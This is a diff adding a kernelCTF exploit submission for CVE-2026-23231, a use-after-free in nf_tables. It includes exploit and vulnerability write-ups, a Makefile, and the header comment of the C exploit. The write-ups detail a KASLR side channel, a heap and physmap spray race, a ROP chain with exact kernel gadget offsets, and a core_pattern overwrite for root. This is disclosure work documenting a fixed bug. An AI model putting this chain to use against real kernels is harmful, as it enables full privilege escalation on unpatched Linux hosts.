diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/exploit.md new file mode 100644 index 000000000..dce11d8d0 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/exploit.md @@ -0,0 +1,214 @@ +# Exploit: cos-113-18244.521.88 + +## Overview + +Local privilege escalation exploit targeting Linux 6.1.155+ (COS-113, PREEMPT_NONE, KVM, 2 CPUs, 3.5 GB RAM). The exploit leverages a packet-path use-after-free in nf_tables `nf_tables_addchain()` to hijack RIP via a fake rule blob, overwrite `core_pattern`, and exfiltrate the flag from `/dev/vdb` via `call_usermodehelper`. + +This exploit targets the packet-path manifestation of CVE-2026-23231. The CVE also covers a control-plane UAF reachable from `nf_tables_dump_chains()`, but the privilege-escalation path here relies on the transient IPv4 hook installed during `NFPROTO_INET` rollback. + +For the public PR, the `exploit` target builds the kernelXDK port in `exploit_xdk.cpp`. The 0-day submission archive of the original non-XDK exploit is carried separately as `original.tar.gz`. + +**Stability**: Probabilistic race. Local QEMU testing showed the internal prefetch-only path was not stable enough for repro, so the submitted metadata uses the kernelCTF separate KASLR leak path (`requires_separate_kaslr_leak=true`). In the repro harness this appends `nokaslr -- kaslr_leak=1`; the init script passes the kernel text base from `/proc/kallsyms` as argv when available. If kallsyms is hidden and the argv value is zero, the exploit uses its `nokaslr` fallback and derives the fixed direct-map base locally. + +**KASLR handling**: In submitted repro mode, `nokaslr` fixes `kbase` at `0xffffffff81000000` and `phbase` at `0xffff888000000000`. The exploit accepts the kernelCTF argv kbase, optional `KBASE`/`PHYSBASE` environment overrides, and a `nokaslr` fallback for local repro. The standalone prefetch side-channel leak path remains implemented for non-repro use. 
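
The base-address sources listed under **KASLR handling** can be read as a simple precedence chain. The following is a minimal sketch, not the exploit's actual code: `pick_base()` is a hypothetical helper, and the ordering (environment override, then argv, then the `nokaslr` constant) is an assumption. The text above only states that a zero argv value falls through to the `nokaslr` fallback.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Fixed bases quoted in the overview for a nokaslr boot. */
#define NOKASLR_KBASE  0xffffffff81000000ULL
#define NOKASLR_PHBASE 0xffff888000000000ULL

/*
 * Hypothetical helper (not taken from the exploit source): return the
 * first non-zero source. The env-before-argv ordering is an assumption.
 * A result of 0 means "no base known; run the side-channel leak".
 */
static uint64_t pick_base(uint64_t env_val, uint64_t argv_val,
                          bool nokaslr, uint64_t nokaslr_base)
{
    /* A nokaslr fallback only makes sense with a non-zero constant. */
    assert(!nokaslr || nokaslr_base != 0);

    if (env_val)
        return env_val;
    if (argv_val)
        return argv_val;
    return nokaslr ? nokaslr_base : 0;
}
```

Called as `pick_base(env_kbase, argv_kbase, has_nokaslr, NOKASLR_KBASE)`, a zero return would signal that the prefetch leak path is still needed.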
+ +--- + +## Step-by-step Exploitation + +### Step 1: KASLR Bypass via Prefetch Side Channel + + + +Outside the kernelCTF separate-leak repro path, the exploit leaks the kernel text base (`kbase`) and direct-map base (`phbase`) using a prefetch side channel. It times `prefetchnta` and `prefetcht2` with `rdtscp`. + +- **Intel kbase scan**: Scans `entry_SYSCALL_64` (`kbase + 0x1400080`) with 16 MB KASLR steps. Each scan primes the syscall path and records the lowest prefetch timing over 16 samples per candidate; the result is the majority vote across 7 scans. + +- **Intel phbase scan**: Scans the direct map from `0xffff888000000000` to `0xffffc88000000000` using lowest-timing votes with a 1 GB coarse step, then refines around the first hit with a 64 MB step. + +- **Fallback scan**: On non-Intel hosts, scans mapped ranges by treating averaged timings above the calibrated threshold as mapped kernel addresses. The threshold is capped at 190 cycles by default and 130 cycles on Xeon hosts, then adjusted down to the measured unmapped baseline plus a 24-cycle margin when the host timing is lower. + +- **Vulnerability verification**: The verifier invokes the exploit with `--vuln-trigger` on a KASAN `nokaslr` kernel. In that mode the exploit skips the LPE payload, KASLR leak, physmap spray, reclaim thread, and candidate schedule. It saturates IPv6 hooks, floods IPv4 LOCAL_OUT, and runs the same INET rollback race, so vulnerable kernels report the packet-path `nft_do_chain()` UAF. Patched kernels wait for an RCU grace period before freeing the chain and should finish without a KASAN report. + +- **Candidate arrays**: The repro path uses the verified primary `kbase`. When pagemap is unavailable, it ranks freed `__init` aliases by prefetch timing and tries 26 candidates with a fresh user/net namespace for each candidate. Direct-map guesses remain as a later fallback. + +**Objects**: None (pure side-channel, no kernel objects involved).
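
Two pieces of arithmetic from the scan description above can be sketched in isolation: the fallback threshold calibration and the 7-scan majority vote. This is a hedged illustration only. The helper names are hypothetical, and two details are assumptions rather than facts from the text: that a flat scan is recorded as a zero vote and ignored, and that a winner needs a strict majority of all scans.

```c
#include <assert.h>
#include <stdint.h>

#define THRESHOLD_MARGIN 24 /* cycles above the measured unmapped baseline */

/* Cap is 190 by default or 130 on Xeon; lower it only if the host is faster. */
static int calibrate_threshold(int cap, int unmapped_baseline)
{
    assert(cap > 0);
    int adjusted = unmapped_baseline + THRESHOLD_MARGIN;
    return adjusted < cap ? adjusted : cap;
}

/*
 * Boyer-Moore majority vote over n scan results.
 * Assumption: a vote of 0 marks an inconclusive scan and is skipped.
 * Returns 0 when no address wins a strict majority of all n scans.
 */
static uint64_t majority_vote(const uint64_t *votes, int n)
{
    uint64_t candidate = 0;
    int balance = 0;

    for (int i = 0; i < n; i++) {
        if (!votes[i])
            continue;
        if (balance == 0) {
            candidate = votes[i];
            balance = 1;
        } else if (votes[i] == candidate) {
            balance++;
        } else {
            balance--;
        }
    }

    /* Second pass: confirm the candidate really holds a majority. */
    int count = 0;
    for (int i = 0; i < n; i++)
        if (candidate && votes[i] == candidate)
            count++;
    return (count * 2 > n) ? candidate : 0;
}
```

The confirmation pass matters because Boyer-Moore alone always yields some candidate, even when the scans disagree completely.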
+ +### Step 2: Physmap Spray with ROP Blob + + + +A 2.5 GB region is allocated via `mmap(MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE)` so parent-side refills remain visible to forked race workers. Every 4 KB page is filled with: + +- **Bytes 0x000-0x097**: A fake `nft_rule_blob` containing a ROP chain (4 fake `nft_immediate_eval` expressions). See [ROP Chain Details](#rop-chain-details) below. +- **Byte 0x100** (`PATH_OFFSET`): The payload string `|/bin/dd if=/dev/vdb of=/dev/ttyS0` (for `core_pattern` overwrite). + +The direct-map base (`phbase`) provides a 1:1 virtual mapping of physical RAM, so these user pages are accessible from the kernel at predictable KVAs (`phbase + pfn * 0x1000` when pagemap is readable). When pagemap is blocked in repro, the exploit first uses the freed `__init_begin..__init_end` linear aliases as stable kernel mappings for sprayed pages. + +If `/proc/self/pagemap` is readable, the exact physical frame number is read to compute the precise KVA. Otherwise, the exploit ranks `__init` page aliases by prefetch timing, tries each candidate for 20 seconds in a fresh child, and keeps the parent polling for late `core_pattern` hits. If that fails, it falls back to direct-map offsets in the `[0.5, 2.5] GB` range from `phbase` (avoiding the QEMU MMIO hole at 3-4 GB physical). + +**Objects**: Physical pages via physmap (direct map). +**Cache**: N/A (physmap pages, not slab objects). + +### Step 3: Namespace Setup + + + +The exploit creates user and network namespaces (`unshare(CLONE_NEWUSER | CLONE_NEWNET)`) to gain `CAP_NET_ADMIN` for nf_tables access. UID/GID mappings are written to `/proc/self/uid_map` and `/proc/self/gid_map`. The loopback interface is brought up (required for UDP flood packets to traverse LOCAL_OUT hooks). + +### Step 4: Saturate IPv6 LOCAL_OUT Hooks + + + +An IPv6 nf_tables table (`t6`) is created, then up to 1024 base chains are added on the `NF_INET_LOCAL_OUT` hookpoint. 
Once `MAX_HOOK_COUNT` (1024) is reached, any subsequent hook registration for IPv6 LOCAL_OUT returns `-E2BIG`. + +This sets up the precondition for triggering the vulnerability: when creating an `NFPROTO_INET` chain, the IPv4 hook succeeds but the IPv6 hook fails with `-E2BIG`. + +An INET table (`ti`) is also created for the race loop. + +**Syscalls**: `sendto()` on `AF_NETLINK` / `NETLINK_NETFILTER` socket (nfnetlink batch messages with `NFT_MSG_NEWTABLE` and `NFT_MSG_NEWCHAIN`). + +### Step 5: Race -- Trigger UAF and Reclaim with msg_msg + + + +Three threads run concurrently on 2 CPUs: + +#### Thread 1: UDP Flood (CPU 1) + +Sends UDP packets to `127.0.0.1:12345` via `sendmmsg()` in batches of 128. Each packet traverses `NF_INET_LOCAL_OUT`, calling `nft_do_chain_inet()` -> `nft_do_chain()` on any registered IPv4 hook. Yields every 8th batch (`sched_yield()`) to report RCU quiescent states, ensuring `synchronize_rcu()` on CPU 0 completes quickly on a PREEMPT_NONE kernel. + +**Purpose**: Provide a continuous stream of packets that hit the transiently installed IPv4 hook during the race window. + +#### Thread 2: INET NEWCHAIN Loop (CPU 0) + +Sends nfnetlink batch messages creating `NFPROTO_INET` base chains. Each attempt: + +1. Chain is allocated (`nft_base_chain`, kmalloc-cg-256) and published to `table->chains` via `list_add_tail_rcu()`. +2. IPv4 hook registers successfully -- packets can now reach `nft_do_chain()` on this chain. +3. IPv6 hook registration fails with `-E2BIG` (hooks saturated). +4. Error path: `nft_chain_del()` removes the chain from the list, then `nf_tables_chain_destroy()` frees the `nft_base_chain` and its rule blob **without `synchronize_rcu()`**. +5. The nfnetlink batch abort path calls `synchronize_rcu()` unconditionally in `__nf_tables_abort()`, which **blocks** this thread -- allowing the spray thread to run. + +**Vulnerable window**: ~2 us between IPv4 hook going live and chain free.
On KVM, VMEXITs (5-20 us each) can delay a packet's `nft_do_chain()` blob read past the kfree point. + +**Vulnerable object**: `struct nft_base_chain` (kmalloc-cg-256). +**Vulnerable field**: `chain.blob_gen_0` / `chain.blob_gen_1` (pointers to rule blob, read by `nft_do_chain()` after free). + +#### Thread 3: Dedicated msg_msg Spray (CPU 0) + +Runs on the **same CPU** as the race thread. When the race thread blocks in `synchronize_rcu()`, the scheduler switches to this thread. It performs: + +1. Burst of 8 `msgsnd()` calls across 512 queues: allocates `msg_msg` objects from CPU 0's `kmalloc-cg-256` per-CPU SLUB freelist. The **first** `msgsnd` after the chain free should pick up the just-freed `nft_base_chain` slot (SLUB LIFO order), while the remaining burst covers scheduler jitter before RCU quiescence. +2. `sched_yield()`: forces context switch -> `rcu_note_context_switch()` -> quiescent state for CPU 0, unblocking the pending `synchronize_rcu()`. + +**Reclaim object**: `struct msg_msg` (kmalloc-cg-256, 256-byte allocation: 48-byte msg_msg header + 208-byte mtext). +**Overwritten fields in reclaimed nft_base_chain**: +| Allocation Offset | Field | Value | mtext Offset | +|---|---|---|---| +| +64 | `basechain.policy` | `1` (NF_ACCEPT) | mtext[16] | +| +80 | `chain.blob_gen_0` | physmap KVA (points to ROP blob page) | mtext[32] | +| +88 | `chain.blob_gen_1` | physmap KVA (same) | mtext[40] | +| +164 | `chain.flags` | `0x01` (NFT_CHAIN_BASE) | mtext[116] | + +When a racing packet on CPU 1 calls `nft_do_chain()` on the freed-and-reclaimed chain, it reads `blob_gen_X` which now points to our physmap ROP blob page. + +#### Synchronization + +- **Race thread <-> Spray thread**: Implicit via `synchronize_rcu()` blocking. When the race thread blocks, the OS scheduler switches to the spray thread on the same CPU. No explicit synchronization primitives. 
+- **Flood thread <-> Race thread**: The flood thread's `sched_yield()` every 8th batch provides RCU quiescent states on CPU 1 while keeping packet pressure on the transient IPv4 hook. +- **Termination**: Shared `volatile int race_running` and `race_won` flags. The parent process polls `core_pattern` every 2 seconds. + +### Step 6: ROP Chain Execution via nft_immediate_eval + + + +When the racing packet dereferences the reclaimed `blob_gen_X` pointer, it reaches our physmap page containing a fake `nft_rule_blob`. The blob is structured as: + +``` ++0x000: blob_size = 0x90 (144 bytes) ++0x008: rule_descriptor_0: dlen=128 (4 expressions x 32 bytes), is_last=0 ++0x010: expression 0 (32 bytes) ++0x030: expression 1 (32 bytes) ++0x050: expression 2 (32 bytes) ++0x070: expression 3 (32 bytes) ++0x090: rule_descriptor_1: is_last=1 (end marker) +``` + +Each expression has `ops` set to `nft_immediate_ops` (`kbase + 0x1d433e0`). The `nft_immediate_eval()` function copies `expr->data` into `regs->data[dreg]`. By targeting the `dreg` corresponding to `nft_do_chain()`'s return address on the stack, we hijack RIP. 
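
The offsets in the blob layout above follow from three sizes: an 8-byte size field, 8-byte rule descriptors, and 32-byte expressions. The sketch below only re-derives those numbers. The macro and function names are illustrative, not the exploit's, and reading `blob_size` as "everything after the size field" is an inference from `0x90 = 8 + 128 + 8`.

```c
#include <assert.h>
#include <stddef.h>

#define BLOB_SIZE_FIELD 8     /* size word at +0x000 */
#define RULE_DESC_SIZE  8     /* one rule descriptor */
#define EXPR_SIZE       32    /* one fake expression */
#define NUM_EXPRS       4
#define PATH_OFFSET     0x100 /* payload string offset within the page */

/* Offset of expression i within the page. */
static size_t expr_offset(int i)
{
    assert(i >= 0 && i < NUM_EXPRS);
    return BLOB_SIZE_FIELD + RULE_DESC_SIZE + (size_t)i * EXPR_SIZE;
}

/* Offset of the trailing is_last=1 descriptor. */
static size_t end_marker_offset(void)
{
    return BLOB_SIZE_FIELD + RULE_DESC_SIZE + (size_t)NUM_EXPRS * EXPR_SIZE;
}

/* Value stored in the size word: descriptor + expressions + end marker. */
static size_t blob_size_value(void)
{
    return RULE_DESC_SIZE + (size_t)NUM_EXPRS * EXPR_SIZE + RULE_DESC_SIZE;
}

/* Bytes of the page occupied by the blob, size word included. */
static size_t blob_total_bytes(void)
{
    return BLOB_SIZE_FIELD + blob_size_value();
}
```

With these sizes the blob ends at byte 0x97, which leaves a gap before the payload string at `PATH_OFFSET`.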
+ +#### ROP Chain Details + +The ROP chain is written into `nft_do_chain()`'s stack frame via the `dreg` mechanism: + +| Expr | dreg | Stack Offset | Gadget / Value | Purpose | +|------|------|-------------|----------------|---------| +| 0 | 130 (ret addr) | rsp+0x250 | `pop rsi; pop rdi; ret` (`kbase + 0xafc2d1`) | Load args for strcpy | +| 0 | (data) | | `rsi` = physmap page + 0x100 (path string), value popped by gadget | Source string | +| 1 | 134 (ret+16) | rsp+0x260 | `rdi` = `kbase + 0x2bb9ec0` (`core_pattern`), then `strcpy` (`kbase + 0x12b59f0`) | Overwrite core_pattern | +| 2 | 138 (ret+32) | rsp+0x270 | `pop rdi; ret` (`kbase + 0x195d8c`), `rdi` = 0x7FFFFFFF | Load msleep argument | +| 3 | 142 (ret+48) | rsp+0x280 | `msleep` (`kbase + 0x243850`), `return_thunk` (`kbase + 0x16054b0`) | Sleep ~25 days (keeps system alive) | + +**Constant explanations**: +- `DREG_RET = 130`: `(0x250 - 0x48) / 4`. `nft_do_chain()` has `sub $0x220, %rsp` + 6 pushes (48 bytes). `regs` is at `rsp+0x48`, return address at `rsp+0x250`. Register file is `uint32_t regs.data[]`, so offset `(0x250 - 0x48) / 4 = 130`. +- `PATH_OFFSET = 0x100`: Offset within each physmap page where the payload string is stored, chosen to be past the 0x98-byte blob. 
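
The `dreg` values in the table can be checked against the stack offsets with the same formula used for `DREG_RET`. This is a small worked example, assuming only the frame facts stated above (`regs` at `rsp+0x48`, 4-byte registers); the function names are hypothetical. It also converts the `msleep` argument to days to confirm the "~25 days" figure.

```c
#include <assert.h>
#include <stdint.h>

#define REGS_STACK_OFF 0x48 /* regs.data[] starts at rsp+0x48 */
#define NFT_REG32_SIZE 4    /* each register slot is a uint32_t */

/* Register index whose storage aliases the given rsp-relative offset. */
static unsigned dreg_for_stack_offset(unsigned stack_off)
{
    assert(stack_off >= REGS_STACK_OFF);
    assert((stack_off - REGS_STACK_OFF) % NFT_REG32_SIZE == 0);
    return (stack_off - REGS_STACK_OFF) / NFT_REG32_SIZE;
}

/* msleep() takes milliseconds; convert to days for a sanity check. */
static double msleep_days(uint32_t msecs)
{
    return msecs / 1000.0 / 86400.0;
}
```

Consecutive expressions advance the stack offset by 0x10, which matches the `dreg` stride of 4 in the table.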
+ +#### Kernel Symbol Offsets (cos-113-18244.521.88 vmlinux) + +| Define | Offset | Symbol | +|--------|--------|--------| +| `OFF_CORE_PATTERN` | `0x2bb9ec0` | `core_pattern` (global variable) | +| `OFF_MODPROBE` | `0x2a76a20` | `modprobe_path` (unused, fallback) | +| `OFF_NFT_IMM_OPS` | `0x1d433e0` | `nft_immediate_ops` (expression ops vtable) | +| `OFF_POP_RSI_RDI` | `0xafc2d1` | `pop rsi; pop rdi; ret` gadget | +| `OFF_POP_RDI` | `0x195d8c` | `pop rdi; ret` gadget | +| `OFF_STRCPY` | `0x12b59f0` | `strcpy` | +| `OFF_MSLEEP` | `0x243850` | `msleep` | +| `OFF_RETURN_THUNK` | `0x16054b0` | `__x86_return_thunk` | + +### Step 7: core_pattern Overwrite and Flag Exfiltration + + + +After the ROP chain executes `strcpy(core_pattern, "|/bin/dd if=/dev/vdb of=/dev/ttyS0")`, the `msleep(0x7FFFFFFF)` keeps the system alive (BUGs with "scheduling while atomic" but `schedule()` still executes, keeping the system up for ~120 seconds until `hung_task` watchdog panics). + +The parent process (forked before entering the exploit child) polls `/proc/sys/kernel/core_pattern` every 2 seconds. Once it detects the overwrite: + +1. Sets `RLIMIT_CORE` to unlimited. +2. Sets `PR_SET_DUMPABLE` to 1. +3. Forks a child that calls `raise(SIGSEGV)`. +4. The kernel's core dump handler invokes `call_usermodehelper` with the pipe command from `core_pattern`. +5. `/bin/dd if=/dev/vdb of=/dev/ttyS0` copies the flag from the virtio block device to the serial console. +6. The kctf infrastructure captures the flag from serial output. + +**Why `core_pattern` instead of `modprobe_path`**: Inside kctf's nsjail container, `modprobe_path` resolution happens in the init mount namespace. The exploit process's memfd (`/proc/PID/fd/N`) is not visible from the init PID namespace (different PID ns), and `/tmp/pw` is on a separate tmpfs. `core_pattern` with `|/bin/dd` uses only init-namespace-visible paths (`/bin/dd` on rootfs, `/dev/vdb` and `/dev/ttyS0` on devtmpfs). 
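
Steps 1 to 3 of the core-dump trigger listed above use only standard process APIs and can be sketched on their own. This is a minimal illustration under stated assumptions, not the body of the exploit's `try_core_dump()`: the function name is hypothetical, and failures of `setrlimit()` and `prctl()` are deliberately ignored here.

```c
#include <assert.h>
#include <signal.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: crash a child with SIGSEGV so the kernel runs
 * its core-dump handler. Returns the child's wait status, or -1 on error.
 */
static int crash_child_for_core_dump(void)
{
    struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY };

    (void)setrlimit(RLIMIT_CORE, &rl);        /* step 1: allow core dumps */
    (void)prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); /* step 2: mark dumpable */

    pid_t pid = fork();                       /* step 3: sacrificial child */
    if (pid < 0)
        return -1;
    if (pid == 0) {
        raise(SIGSEGV);
        _exit(1); /* only reached if SIGSEGV was blocked or handled */
    }
    assert(pid > 0);

    int status = 0;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return status;
}
```

A caller can confirm the child died as intended with `WIFSIGNALED(status)` and `WTERMSIG(status) == SIGSEGV`.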
+ +**Why `msleep()` instead of `do_exit()`**: `do_exit()` from softirq context kills the current task and closes all file descriptors (including memfd FDs). `msleep()` BUGs with "scheduling while atomic" but `schedule()` still executes, keeping the system alive long enough for the parent to detect the overwrite and trigger core dumps. + +--- + +## Environmental Requirements + +- **CPU affinity**: The race thread and spray thread are pinned to CPU 0; the flood thread is pinned to CPU 1. This is critical because: + - SLUB uses per-CPU freelists. The spray thread must run on the same CPU as the race thread to pick up the freed `nft_base_chain` slot (LIFO order). + - The flood thread on a separate CPU ensures packets traverse the hook path concurrently with chain allocation/free. + +- **Namespaces**: User namespace + network namespace are required to gain `CAP_NET_ADMIN` for nf_tables access. The exploit calls `unshare(CLONE_NEWUSER)` then `unshare(CLONE_NEWNET)`. + +- **Memory**: The exploit uses 2.5 GB for physmap spray (auto-capped to 75% of available RAM on smaller systems). The kctf VM has 3.5 GB RAM. + +- **SMAP detection**: If SMAP is not present (e.g., TCG mode), the exploit uses a userspace page as the fake blob instead of physmap spray, eliminating the need for phbase scanning entirely. 
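
The memory requirement above reduces to a one-line cap. The sketch below assumes the cap is computed in megabytes from an "available RAM" figure. How the exploit measures that figure is not shown in this document, so `avail_mb` is a plain parameter and `spray_size_mb()` is a hypothetical name.

```c
#include <assert.h>
#include <stdint.h>

#define PHYSMAP_MB 2560 /* default spray size: 2.5 GB */

/* Spray size in MB: the default, capped at 75% of available RAM. */
static uint64_t spray_size_mb(uint64_t avail_mb)
{
    assert(avail_mb <= UINT64_MAX / 3); /* guard the multiply */
    uint64_t cap = avail_mb * 3 / 4;
    return cap < PHYSMAP_MB ? cap : PHYSMAP_MB;
}
```

On the 3.5 GB kctf VM the 75% cap is 2688 MB, so the full 2560 MB default applies.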
+ +## Separation of Concerns + +| Code Section | Purpose | +|---|---| +| `do_entrybleed()` / `leak_entrybleed()`, `leak_kernel_text_prefetch()`, `leak_direct_mapping_prefetch()` | KASLR bypass (information leak) | +| `setup_ns()` | Environment setup (namespace creation) | +| `saturate_ipv6_hooks()` | Vulnerability setup (creating precondition for -E2BIG failure) | +| `vuln_trigger_main()` | KASAN verifier path for reachability only | +| `inet_race_thread()` | Vulnerability trigger (INET NEWCHAIN creating the UAF) | +| `udp_flood_thread()` | Exploitation support (providing racing packets) | +| `dedicated_spray_thread()`, `spray_msgs()`, `build_spray_msg()` | Heap spraying (msg_msg reclaim of freed nft_base_chain) | +| `physmap_spray()`, `physmap_fill_rop()`, `build_blob()` | ROP payload construction | +| `try_core_dump()`, `try_modprobe()` | Post-exploitation (flag exfiltration) | diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/vulnerability.md new file mode 100644 index 000000000..8d812b737 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/vulnerability.md @@ -0,0 +1,68 @@ +# Vulnerability: Use-After-Free in nf_tables_addchain() Error Path (CVE-2026-23231) + +## Summary + +A use-after-free vulnerability exists in the netfilter `nf_tables` subsystem, specifically in the error path of `nf_tables_addchain()`. If hook registration fails after the chain has been published, the error path calls `nft_chain_del()` and then immediately calls `nf_tables_chain_destroy()` without an intervening `synchronize_rcu()`. + +This violates the RCU publish/grace-period/free contract and creates two separate UAF conditions covered by CVE-2026-23231: + +- **Control-plane UAF**: `nf_tables_dump_chains()` traverses `table->chains` under `rcu_read_lock()`, so a concurrent dump can still walk the chain after it has been removed with `list_del_rcu()` but before readers quiesce. 
+- **Packet-path UAF**: for `NFPROTO_INET`, `nf_register_net_hook()` can briefly install the IPv4 hook before IPv6 registration fails. Packets entering `nft_do_chain()` through that transient IPv4 hook can still dereference `chain->blob_gen_X` after the chain has been freed. + +The exploit in this submission uses the second condition: partial `NFPROTO_INET` hook registration failure caused by exhausting IPv6 `LOCAL_OUT` hooks. + +## Affected Component + +- **Subsystem**: netfilter / nf_tables +- **Source file**: `net/netfilter/nf_tables_api.c` +- **Function**: `nf_tables_addchain()` + +## Vulnerability Type + +- **Cause**: Use-After-Free (UAF) due to missing RCU grace period +- **Root cause**: `nf_tables_addchain()` frees the chain immediately after `list_del_rcu()` on the hook-registration failure path, allowing concurrent RCU readers to observe freed memory + +## Requirements to Trigger + +- **User namespaces**: Not required for the bug in general, but required for this exploit so an unprivileged user can create a network namespace and gain `CAP_NET_ADMIN` inside it. +- **Capabilities**: `CAP_NET_ADMIN` (inside the attacker's network namespace for this exploit) +- **Kernel configuration**: `CONFIG_NF_TABLES`, `CONFIG_NF_TABLES_INET` +- **Other**: Ability to saturate IPv6 hooks to `MAX_HOOK_COUNT` (1024) to force the IPv6 hook registration failure + +## Commit Which Introduced the Vulnerability + +- **Commit**: [`91c7b38dc9f0`](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=91c7b38dc9f0de4f7f444b796d14476bc12df7bc) ("netfilter: nf_tables: use new transaction infrastructure to handle chain") +- This commit introduced the transaction-based chain handling and the vulnerable teardown path that removes a chain with `list_del_rcu()` and then frees it without waiting for an RCU grace period when hook registration fails. 
+ +## Commit Which Fixed the Vulnerability + +- **Fix**: Add `synchronize_rcu()` between `nft_chain_del()` and `nf_tables_chain_destroy()` in the `err_register_hook` error path of `nf_tables_addchain()`. +- **Patch commit**: [`71e99ee20fc3`](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=71e99ee20fc3f662555118cf1159443250647533) ("netfilter: nf_tables: fix use-after-free in nf_tables_addchain()") + +## Affected Kernel Versions + +- **Introduced in**: 3.16 (when `91c7b38dc9f0` first shipped) +- **Affected stable ranges**: 3.16 - 6.1.164, 6.2 - 6.6.127, 6.7 - 6.12.74, 6.13 - 6.18.13, and 6.19 - 6.19.3 +- **Fixed in**: 6.1.165, 6.6.128, 6.12.75, 6.18.14, 6.19.4, and mainline 7.0-rc1 + +## Blocking the Vulnerability + +The vulnerability can be prevented by any of the following: + +- **Disabling user namespaces** (`kernel.unprivileged_userns_clone=0` or equivalent) prevents this exploit path from obtaining `CAP_NET_ADMIN` in a private network namespace. +- **Blocking `NETLINK_NETFILTER` socket creation** from unprivileged contexts. +- **Disabling nf_tables support** (`CONFIG_NF_TABLES=n`) or, more narrowly, disabling INET chains (`CONFIG_NF_TABLES_INET=n`). +- **Limiting `nf_tables` access** via security modules (e.g., SELinux, AppArmor policies denying netfilter configuration). + +## KASAN Report + +``` +BUG: KASAN: use-after-free in nft_do_chain+0x1214/0x12a0 +Read of size 8 at addr ffff888103ef0b00 by task init/76 +... 
+Allocated by task 77: + nf_tables_addchain.constprop.0+0x8f9/0x1f80 +Freed by task 77: + nf_tables_chain_destroy+0xb8/0x530 + nf_tables_addchain.constprop.0+0xe6f/0x1f80 +``` diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/Makefile b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/Makefile new file mode 100644 index 000000000..9ae3f525b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/Makefile @@ -0,0 +1,45 @@ +# kernelCTF exploit build for cos-113-18244.521.88 +# +# Default target builds the kernelXDK-integrated version (exploit_xdk.cpp). +# Use 'make exploit_original' for the original C version (exploit.c). + +KERNELXDK_INCLUDE_DIR ?= +KERNELXDK_LIB_DIR ?= + +CXX ?= g++ +CC ?= gcc +CXXFLAGS := -g -std=c++20 -I. -static -O2 -Wall -pthread +CFLAGS := -g -static -O2 -Wall -pthread + +ifneq ($(strip $(KERNELXDK_INCLUDE_DIR)),) +CXXFLAGS += -I$(KERNELXDK_INCLUDE_DIR) +endif + +LDFLAGS := -lkernelXDK -pthread +ifneq ($(strip $(KERNELXDK_LIB_DIR)),) +LDFLAGS := -L$(KERNELXDK_LIB_DIR) $(LDFLAGS) +endif + +.PHONY: all prerequisites run clean + +all: exploit + +prerequisites: target_db.kxdb + +# Download kernelXDK target database if not present +target_db.kxdb: + wget -q -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +# kernelXDK-integrated version (C++) +exploit: exploit_xdk.cpp target_db.kxdb + $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) + +# Original C version (does not require kernelXDK) +exploit_original: exploit.c + $(CC) $(CFLAGS) -o $@ $< + +run: exploit + ./exploit + +clean: + rm -f exploit exploit_original target_db.kxdb diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit new file mode 100755 index 000000000..d5b1cecda Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit differ diff 
--git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit.c b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit.c new file mode 100644 index 000000000..194457976 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit.c @@ -0,0 +1,2503 @@ +/* + * LPE exploit for cos-113-18244.521.88 (Linux 6.1.155) + * + * Vulnerability: packet-path UAF in nftables via NFPROTO_INET partial hook + * install (docs/vulnerability.md). IPv4 hook registration succeeds, IPv6 + * fails with -E2BIG -> rollback frees chain/blob immediately + * while a racing packet still dereferences priv->chain in + * nft_do_chain(). + * + * Exploitation: + * 1. Prefetch side-channel KASLR bypass. + * 2. Physmap spray with fake rule blob (ROP via nft_immediate_eval). + * 3. Saturate IPv6 LOCAL_OUT hooks to MAX_HOOK_COUNT (1024). + * 4. Race: UDP flood + INET basechain create/destroy loop + msg_msg spray + * to reclaim freed nft_base_chain (kmalloc-cg-256) with blob_gen_X -> + * physmap page. + * 5. ROP: strcpy(core_pattern, "|/bin/dd ...") -> msleep(~forever). + * 6. Trigger core dump -> flag on serial console. + * + * Race design (no padding hooks): + * Without padding hooks, there's a ~2us window between IPv4 hook going + * live and WRITE_ONCE(accept_all). Packets entering in this window call + * nft_do_chain_inet -> nft_do_chain which reads blob_gen_X. On KVM, + * VMEXITs (5-20us each) can delay the blob_gen_X read past the kfree + + * reclaim point, making exploitation probabilistic but feasible. + * + * A dedicated spray thread on CPU 0 continuously does msgsnd+sched_yield. + * When the race thread blocks in synchronize_rcu (abort path), the + * scheduler switches to the spray thread, which picks up the just-kfree'd + * basechain slot from CPU 0's SLUB freelist (LIFO).
